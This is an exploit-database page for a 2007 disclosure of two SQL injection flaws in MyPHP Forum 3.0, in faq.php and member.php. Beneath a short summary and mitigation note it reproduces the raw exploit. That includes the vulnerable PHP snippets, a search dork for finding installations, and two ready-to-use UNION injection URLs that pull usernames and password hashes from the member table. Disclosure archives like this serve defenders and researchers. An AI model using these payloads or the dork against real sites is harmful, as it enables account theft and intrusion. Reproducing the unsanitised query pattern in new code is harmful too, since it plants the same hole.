MyPHP Forum - exploit.company

vendor:

MyPHP Forum

by:

x0kster

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MyPHP Forum

Affected Version From: <= 3.0 (Final)

Affected Version To: <= 3.0 (Final)

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability

The MyPHP Forum script version 3.0 (Final) is vulnerable to multiple remote SQL injection vulnerabilities. The first vulnerability exists in the faq.php file, where the 'id' parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability to execute arbitrary SQL queries. The second vulnerability exists in the member.php file, where the 'member' parameter is not properly sanitized before being used in an SQL query. An attacker can exploit this vulnerability to execute arbitrary SQL queries.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user inputs before using them in SQL queries. Additionally, enabling magic_quotes_gpc on the server can provide some level of protection against SQL injection attacks.

Source

Exploit-DB raw data:

Name            :  MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.myphp.ws/
Date            :  31/12/2007
Dork            :  "Powered by: MyPHP Forum"

Note: 
For work, magic_quotes_gpc must be turned off on the server.
Usally the table prefix is 'nb'.



Sql injection in faq.php

   <?php
    //faq.php
    [...]
    $id = $_GET['id'];
    if($action == "view" && !empty($id)) {
	$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
	$row = mysql_fetch_array($result);
	$row[answer] = postify($row[answer]);
    [...]
   ?>

So we can execute an sql injection thrught the bugged variable $id.

PoC:

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*




Sql injection in member.php

   <?php
    //member.php
   [...]
    if($action == "viewpro") {
	$member = $HTTP_GET_VARS['member'];
	$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
   [...]
   ?>

So $member variable isn't controlled so we can exploit it.

PoC:

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*

# milw0rm.com [2007-12-31]